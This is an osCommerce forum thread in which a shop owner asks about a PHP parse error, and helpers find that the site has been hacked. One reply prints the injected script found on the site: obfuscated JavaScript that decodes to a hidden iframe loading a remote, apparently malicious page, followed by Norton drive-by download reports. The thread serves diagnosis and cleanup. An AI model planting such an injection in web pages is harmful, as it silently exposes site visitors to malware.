Error in catalog/index.php line 187

[Guest]

I get this when we go to the shopping cart client side

 

Parse error: syntax error, unexpected $end in /home/moret2/public_html/catalog/index.php on line 187

 

I looked at the line which is this:

 

186 // We show them all

187 $listing_sql = "select " . $select_column_list . " p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_PRODUCTS . " p left join " . TABLE_MANUFACTURERS . " m on p.manufacturers_id = m.manufacturers_id left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c where p.products_status = '1' and p.products_id = p2c.products_id and pd.products_id = p2c.produ

 

I know that the end is incorrect but this happened overnight without anyone doing anything to the website or oscommerce installation and I contacted the hosting company and they said nothing had been done on the server. What happened and how do I fix this cause I have no clue what the end should be?

 

Thank you very much

[germ]

The site linked to in your profile has been hacked:

 

</head><script type="text/javascript">var xkEyyvGRxZUHiUvfAHXn = "kYt60kYt105kYt102kYt114kYt97kYt109kYt101kYt32kYt119kYt105kYt100kYt116kYt104k
Yt61kYt34kYt52kYt56kYt48kYt34kYt32kYt104kYt101kYt105kYt103kYt104kYt116kYt61kYt34k
Yt54kYt48kYt34kYt32kYt115kYt114kYt99kYt61kYt34kYt104kYt116kYt116kYt112kYt58kYt47k
Yt47kYt104kYt105kYt116kYt45kYt115kYt101kYt110kYt100kYt101kYt114kYt115kYt46kYt99kY
t110kYt47kYt102kYt105kYt110kYt100kYt47kYt105kYt110kYt46kYt99kYt103kYt105kYt63kYt5
2kYt34kYt32kYt115kYt116kYt121kYt108kYt101kYt61kYt34kYt98kYt111kYt114kYt100kYt101k
Yt114kYt58kYt48kYt112kYt120kYt59kYt32kYt112kYt111kYt115kYt105kYt116kYt105kYt111kY
t110kYt58kYt114kYt101kYt108kYt97kYt116kYt105kYt118kYt101kYt59kYt32kYt116kYt111kYt
112kYt58kYt48kYt112kYt120kYt59kYt32kYt108kYt101kYt102kYt116kYt58kYt45kYt53kYt48kY
t48kYt112kYt120kYt59kYt32kYt111kYt112kYt97kYt99kYt105kYt116kYt121kYt58kYt48kYt59k
Yt32kYt102kYt105kYt108kYt116kYt101kYt114kYt58kYt112kYt114kYt111kYt103kYt105kYt100
kYt58kYt68kYt88kYt73kYt109kYt97kYt103kYt101kYt84kYt114kYt97kYt110kYt115kYt102kYt1
11kYt114kYt109kYt46kYt77kYt105kYt99kYt114kYt111kYt115kYt111kYt102kYt116kYt46kYt65
kYt108kYt112kYt104kYt97kYt40kYt111kYt112kYt97kYt99kYt105kYt116kYt121kYt61kYt48kYt
41kYt59kYt32kYt45kYt109kYt111kYt122kYt45kYt111kYt112kYt97kYt99kYt105kYt116kYt121k
Yt58kYt48kYt34kYt62kYt60kYt47kYt105kYt102kYt114kYt97kYt109kYt101kYt62";var jkhHpzrFkCQhnUglPmDM = xkEyyvGRxZUHiUvfAHXn.split("kYt");var MXUusQasXxgHhOOXNFdx = "";for (var ItfvOMhdykqLILFAbftz=1; ItfvOMhdykqLILFAbftz<jkhHpzrFkCQhnUglPmDM.length; ItfvOMhdykqLILFAbftz++){MXUusQasXxgHhOOXNFdx+=String.fromCharCode(jkhHpzrFkCQhnUglPmDM[ItfvOMhdykqLILFAbftz]);}var uBySxOjiajVeIGOIvdos = ""+MXUusQasXxgHhOOXNFdx+"";document.write(""+uBySxOjiajVeIGOIvdos+"")</script>

(Code I just found in it)

 

Maybe someone's hacked whatever site you're referring to in this post also and modified the code for you?

:unsure:

[spooks]

How to secure your site: http://www.oscommerce.com/forums/index.php?showtopic=313323

[Guest]

This is good but it still won't help me fix the problem. Where did you find this code? not in my index.php I just checked it over

[germ]

It's probably disguised as obfuscated PHP code.

 

The error you're getting usually means you don't have the same number of { and } in the active code.

[Guest]

Ok thanks but I'm still at the "What should I do stage" I'm not a php programmer and I have no clue how to fix this! I have to get this fixed ASAP. Anyone here can help?

[Guest]

Ok so I managed to clean up the site and get everything running like it did before. I also added security addons mentionned above to help prevent any problems at a later date. Now I also installed Norton 360 on my computer to prevent any info from my computer to help hack my site. My question is this now. On the norton site I have this information given about threats left on my site in the Catalog possibly. How do I get rid of these????

 

Thanks for any help!

 

Drive-By Downloads (what's this?)

Threats found: 3

Here is a complete list:

 

Threat Name: Suspicious Process

Process name: C:\WINDOWS\9129837.exe

Location: http://morettiglasscanada.com/catalog/inde...1f29457907037df

 

 

 

Threat Name: Process Started

Process name: C:\Documents and Settings\user\file.exe

Location: http://morettiglasscanada.com/catalog/inde...1f29457907037df

 

 

 

Threat Name: Direct link to Suspicious Process

Location: http://morettiglasscanada.com/catalog/inde...1f29457907037df

[germ]

I clicked around all over your site and my antivirus was very quite this time.

 

From what you've posted I'd say your computer is infected with malware.

 

I suggest going here for expert advice for it's detection and removal.

 

Local viruses and their removal are beyond the scope of this forum.